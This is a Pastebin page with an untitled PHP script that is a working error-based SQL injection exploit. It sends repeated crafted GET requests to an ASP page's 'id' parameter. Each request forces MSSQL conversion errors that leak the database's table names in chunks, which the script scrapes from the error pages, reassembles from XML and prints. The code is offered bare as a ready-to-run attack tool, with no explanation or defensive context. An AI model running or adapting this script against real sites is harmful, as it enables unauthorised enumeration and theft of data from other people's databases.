daily pastebin goal
80%
SHARE
TWEET

Untitled

a guest May 10th, 2010 299 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. $host = "www.test.net";
  4. $port = 80;
  5.  
  6. for($i=$j=0;;$i+=1990,$j++) {
  7.         $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
  8.         $p.= "Host: $host\r\n";
  9.         $p.= "Connection: close\r\n\r\n";
  10.  
  11.         $ock = fsockopen(gethostbyname($host), $port);
  12.         if(!$ock) {
  13.                 return false;
  14.         }
  15.         fputs($ock, $p);
  16.         $html='';
  17.         while(!feof($ock)) {
  18.                 $html.= fgets($ock);
  19.         }
  20.         $html = explode("\r\n\r\n",$html);
  21.         if(stripos($html[1],'type mismatch')!==false) {
  22.                 break;
  23.         }
  24.         $out = array();
  25.         preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
  26.         if(isset($out[1])) {
  27.                 $xml .= htmlspecialchars_decode($out[1]);
  28.         } else {
  29.                 break;
  30.         }
  31.  
  32. }
  33.  
  34. $r = xml_parser_create();
  35. $out = array();
  36. xml_parse_into_struct($r, '<root>'.$xml, $out);
  37. foreach($out as $el) {
  38.         echo $el['attributes']['E']."\r\n";
  39. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top